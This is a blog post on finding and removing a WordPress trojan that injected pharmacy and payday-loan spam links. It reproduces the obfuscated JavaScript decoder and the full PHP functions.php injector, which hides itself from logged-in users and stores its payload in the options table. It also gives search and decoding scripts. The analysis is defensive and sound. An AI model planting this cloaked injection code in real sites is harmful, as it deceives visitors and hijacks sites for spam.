Notes from a Web Trojan Clean-up


My WordPress blog had been infected with a web trojan: an English-language advertisement had been planted in the page header, as shown in Figure 1.

Figure 1: The advertisement planted by the web trojan

So began my effort to hunt down and remove the trojan. The process was fairly painful, but the problem was solved in the end, and I decided to write down some of the experience and lessons learned in the hope that they help someone else. Hence this post.

First of all, this was not the first time the site had been infected; I would even say it is a required course for anyone running an independent blog. Earlier infections were simple: a piece of JS planted at the top or bottom of a page, easy to locate by searching the page for a keyword and gone once deleted.
This time, however, the trojan was more elaborate. Looking at the page source, the following JS had been planted just before the </head> tag. It does not write an advertisement directly; it looks more like a decoder fragment, and it cannot be run on its own (to this day I have not fully understood this code).

<script language="JavaScript">
	var _gu6 = [];
	_gu6.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
	_gu6.push(['_setOption', '6918518510413211617416517217519017117018618118219318218']);
	_gu6.push(['_trackPageview', '1185175186175181180128167168185181178187186171129169178']);
	_gu6.push(['_setOption', '1751821281841711691861101221231231821901141671871861811']);
	_gu6.push(['_trackPageview', '1416718718618111412212312318219011112919513011718518619']);
	_gu6.push(['_setOption', '1178171132']);
	var if='a',h9='o',nf='m',wf='e',k0='f',o5='o',mb='r',rc='r',s8='C',w0='C',yb='h',ta='d',t76=z56='';
	var d12=3,d22=70,l44=p23=v48=0;for(v48=0;v48<_gu6.length;v48++)t76+=_gu6[v48][1];l44=t76.length;
	while(p23<l44)z56+=String[k0+mb+o5+nf+s8+yb+if+rc+w0+h9+ta+wf](parseInt(t76.slice(p23,p23+=d12))-d22);
	document.write(z56);
</script>

Right after the <body> tag, the following advertisement had been planted. My guess at the time was that the JS code above was what wrote this advertisement, though that was only a guess.

Decoding the digit strings with the script's own rule (three digits per character, minus 70) shows that the script writes not the advertisement but a style rule: <style type="text/css">.h_fixedtop{position:absolute;clip:rect(455px,auto,auto,455px);}</style>. That rule clips the h_fixedtop block out of view, so the intended effect is that human visitors never see the spam links while search-engine crawlers still index them; the _setOption/_trackPageview names exist only to make the block resemble old Google Analytics tracking code. Note also that, as reproduced here, one of the variables is named if, a reserved word, so the script throws a syntax error and writes nothing, which is presumably why the advertisement was visible in Figure 1 at all.

<div class="h_fixedtop">
	<p>Borrowers can avoid paying the no generic levitra <a href="http://levitra6online.com" title="generic levitra">generic levitra</a> more about unsecured loan.Let money must have literally no viagra online without prescription <a href="http://wwwwviagracom.com" title="viagra online without prescription">viagra online without prescription</a> complications that our bills.Make sure that provides funding without much hustle online cash advance loans <a href="http://cashadvance6online.com" title="online cash advance loans">online cash advance loans</a> as regards to forward the application.Is the reason for extra for business of viagra <a href="http://viagra5online.com" title="viagra">viagra</a> unpaid bill late payments credit problems.Bills might be repeatedly denied credit applicants get cash fast <a href="http://wwwcashadvancescom.com" title="get cash fast">get cash fast</a> must meet some necessary funds.Looking for are you a chapter is levitra <a href="http://wwwlevitrascom.com" title="levitra">levitra</a> useful for borrowers at risk.And if unable to utilize these lenders will free cialis <a href="http://cialis8online.com" title="free cialis">free cialis</a> carry a situation has to surprises.Everyone experiences financial situation has had a last requirement is cialis <a href="http://wwwcialiscomcom.com" title="cialis">cialis</a> trying to contribute a spotless employment history.</p>
</div>

A simple search of the PHP source turned up none of the code above. WordPress has far too many source files to check one by one, so I wrote a small PHP program that walks the WordPress directory and searches for a keyword. The source is as follows:

<?php
// Walk $dir recursively, open every file whose extension is $ext and print
// the path of each one that contains $keyword.  (Only the echo, fclose/closedir
// and the final call survived on this page; the surrounding function body is
// reconstructed around them.)
function listDir($dir, $ext, $keyword) {
    if (!($dh = opendir($dir))) {
        return;
    }
    while (($file = readdir($dh)) !== false) {
        if ($file == "." || $file == "..") {
            continue;
        }
        $path = $dir . "/" . $file;
        if (is_dir($path)) {
            listDir($path, $ext, $keyword);   // descend into subdirectories
        } elseif (pathinfo($path, PATHINFO_EXTENSION) == $ext) {
            if ($handle = fopen($path, "r")) {
                while (($line = fgets($handle)) !== false) {
                    if (strpos($line, $keyword) !== false) {
                        echo "Found it~~~ file name: ", $dir . "/" . $file, "<br>";
                        //break;   // left commented out, so every matching line is reported
                    }
                }
                fclose($handle);
            }
        }
    }
    closedir($dh);
}
// Search the PHP files under the given directory for ones containing "Borrowers"
listDir("/wordpress", "php", "Borrowers");

Running search.php found neither the key JS code nor any of the advertisement text. From this I inferred that the JS is not planted statically in any one page; more likely it was planted in the PHP source, so that every execution of the PHP generates the JS and with it the advertisement.

I tried switching to a different theme and the advertisement was still there, which meant the trojan had infected every theme's files or was being injected from some global function; I even suspected it had been planted in the database.

WordPress has too many files to inspect one by one for suspicious code, so instead I traced the request from index.php step by step, following each file it loads and echoing suspicious values along the way: wp-blog-header.php, wp-load.php, template-loader.php... until I finally landed in the theme's functions.php and found the malicious PHP hidden further down in it:

if (!function_exists("b_call")) {
    // Hooked on init, wp_head, get_sidebar and wp_footer: whichever fires first
    // opens an output buffer whose callback rewrites the finished page
    function b_call() {
        if (!ob_get_level()) ob_start("b_goes");
    }
    // Output-buffer callback: $p is the whole rendered HTML of the request
    function b_goes($p) {
        if (!defined('wp_m1')) {
            // Cloaking: return the clean page to anyone carrying WordPress cookies
            // or logged in, and do nothing at all if the payload option is missing
            if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in()) || (!$m = get_option('_metaalternate1'))) {
                return $p;
            }
            // The payload is the wp_options row _metaalternate1: a serialized
            // [head snippet, body snippet] pair stored character-reversed
            list($m, $n) = @unserialize(trim(implode(array_reverse(preg_split('::u', $m)))));
            define('wp_m1', $m);
            define('wp_n1', $n);
        }
        // Body snippet right after the opening <body> tag, head snippet right
        // before </head>; fall back to the first </div> if either tag is absent
        if (!stripos($p, wp_n1)) $p = preg_replace("~<body[^>]*>~i", "$0\n".wp_n1, $p, 1);
        if (!stripos($p, wp_m1)) $p = preg_replace("~</head>~", wp_m1."\n</head>", $p, 1);
        if (!stripos($p, wp_n1)) $p = preg_replace("~</div>~", "</div>\n".wp_n1, $p, 1);
        if (!stripos($p, wp_m1)) $p = preg_replace("~</div>~", wp_m1."\n</div>", $p, 1);
        return $p;
    }
    // Hooked on shutdown: flushing the buffer runs b_goes over the page
    function b_end() {
        @ob_end_flush();
    }
    // Discard any buffer already open so the malware's own buffer wraps the whole page
    if (ob_get_level()) ob_end_clean();
    add_action("init", "b_call");
    add_action("wp_head", "b_call");
    add_action("get_sidebar", "b_call");
    add_action("wp_footer", "b_call");
    add_action("shutdown", "b_end");
}

So the injection goes through WordPress's add_action hook rather than through any page file. b_call is registered on init, wp_head, get_sidebar and wp_footer, so whichever of those fires first opens an output buffer with b_goes as its callback; b_end, registered on shutdown, flushes that buffer, and b_goes receives the entire rendered page in $p and uses regular expressions to place one snippet before </head> and the other right after the <body> tag (falling back to the first </div>). Two details matter for the clean-up. First, the snippets themselves are not in the PHP at all: they come from the options-table row _metaalternate1, stored character-reversed and serialized as a two-element array, which is why neither the JS nor the advertisement text ever turned up in the file search. Commenting out the hook stops the injection, but that row stays in the database until it is deleted (for example with wp option delete _metaalternate1, or a DELETE on the options table), and however functions.php was modified in the first place still needs to be closed off. Second, b_goes returns the untouched page to any request carrying wordpress_test_cookie, wp-settings-1 or wp-settings-time-1, or from a logged-in user, so the site owner's own browser is the worst place to check whether the ad is gone; use a fresh private window or curl with no cookies. This approach is indeed cleverer and far more covert than simply pasting JS into a file.

Seen this way, both JS and PHP injections usually sit at the top or bottom of a file; the only reason this JS could land between the head and body tags is that PHP located those tags by regular expression.
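The two decoding steps above, the reversed serialized option that b_goes() reads and the digit strings that the injected script turns into a style rule, can be reproduced offline. The following PHP is an added example written for this post, not the malware's code and not the author's. It assumes the _metaalternate1 value had the shape b_goes() expects (a character-reversed, serialized two-element array) and constructs such a value from two short stand-in snippets, because the real value was never shown; the _gu6 digit strings are copied verbatim from the injected script.

```php
<?php
// Added example (not the post's code and not the malware's own code): mirror the
// two decoding steps the malware performs so its payloads can be checked offline.

// Same effect as the malware's preg_split('::u', ...): an empty pattern splits a
// UTF-8 string into single characters (falls back to bytes if not valid UTF-8).
function reverse_chars(string $s): string
{
    $chars = preg_split('//u', $s) ?: str_split($s);
    return implode('', array_reverse($chars));
}

// What b_goes() does with get_option('_metaalternate1'):
// reverse, trim, unserialize into [head snippet, body snippet].
function decode_option(string $stored): array
{
    $pair = @unserialize(trim(reverse_chars($stored)));
    return (is_array($pair) && count($pair) === 2) ? array_values($pair) : [];
}

// Inverse of decode_option(); used only to build the CONSTRUCTED sample below.
function encode_option(string $head, string $body): string
{
    return reverse_chars(serialize([$head, $body]));
}

// What the injected <script>'s while-loop does with the _gu6 digit strings:
// concatenate, cut into 3-digit groups, subtract 70, map to a character.
function decode_digits(array $chunks, int $width = 3, int $offset = 70): string
{
    $out = '';
    foreach (str_split(implode('', $chunks), $width) as $group) {
        $out .= chr((int) $group - $offset);
    }
    return $out;
}

// CONSTRUCTED stand-ins for the two snippets quoted on the page; the real
// _metaalternate1 row was never shown in the post.
$head   = '<script language="JavaScript">/* decoder */</script>';
$body   = '<div class="h_fixedtop"><p>Borrowers can avoid paying ...</p></div>';
$stored = encode_option($head, $body);

list($m, $n) = decode_option($stored);
echo "wp_m1 (inserted before </head>): $m\n";
echo "wp_n1 (inserted after <body>):   $n\n";

// Digit strings exactly as they appear in the injected <script>.
$digits = [
    '1301851861911781711021861911821711311041861711901861171',
    '6918518510413211617416517217519017117018618118219318218',
    '1185175186175181180128167168185181178187186171129169178',
    '1751821281841711691861101221231231821901141671871861811',
    '1416718718618111412212312318219011112919513011718518619',
    '1178171132',
];
echo "The <script> document.write()s: ", decode_digits($digits), "\n";
```

Run it with the PHP CLI. decode_option() returns the head and body snippets in the order b_goes() assigns them to wp_m1 and wp_n1, and decode_digits() returns the style rule the script's document.write() emits, the CSS that clips the h_fixedtop block out of view. The same two functions can be pointed at a real _metaalternate1 value dumped from the options table to see exactly what a live infection is serving.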

Running the search function again,

listDir("/wordpress", "php", "b_call");

found, sure enough, that every infected theme had it in functions.php.

After commenting out that code, the whole world finally went quiet ╮(╯▽╰)╭.

I still have not fully read through what this malicious code does, so the trojan may not be completely cleaned up yet; it should be an interesting thing to study when I have time.

 
